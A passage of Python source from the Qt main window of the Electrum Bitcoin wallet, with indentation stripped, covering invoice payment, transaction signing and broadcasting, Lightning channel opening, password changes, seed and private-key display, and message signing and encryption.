self.do_pay_invoice(invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice):
if invoice.type == PR_TYPE_LN:
self.pay_lightning_invoice(invoice.invoice, invoice.amount)
elif invoice.type == PR_TYPE_ONCHAIN:
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
self.show_message(_('Not Enough Funds'))
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.amount) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
grid.addWidget(QLabel(lnaddr.paymenthash.hex()), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit()
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if not self.network.is_lightning_running():
return
cur, total = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_percent = 0
progress_str = "??%"
if cur is not None and total is not None and total > 0:
# note: Progress is rescaled such that 95% is considered "done".
# "Real" progress can stay around 98-99% for a long time, which
# might needlessly worry users.
progress_percent = (1.0 / 0.95 * cur / total) * 100
progress_percent = min(progress_percent, 100)
progress_percent = round(progress_percent)
progress_str = f"{progress_percent}%"
if progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 4 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
else:
lightning_b = QPushButton(_('Enable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.enable_lightning)
lightning_label = QLabel(_('Disabled'))
grid.addWidget(lightning_label, 5, 1)
grid.addWidget(lightning_b, 5, 2)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
labels_clayout.selected_index()
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_show_xpub = run_hook('show_xpub_button', self, dialog, labels_clayout)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_show_xpub, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
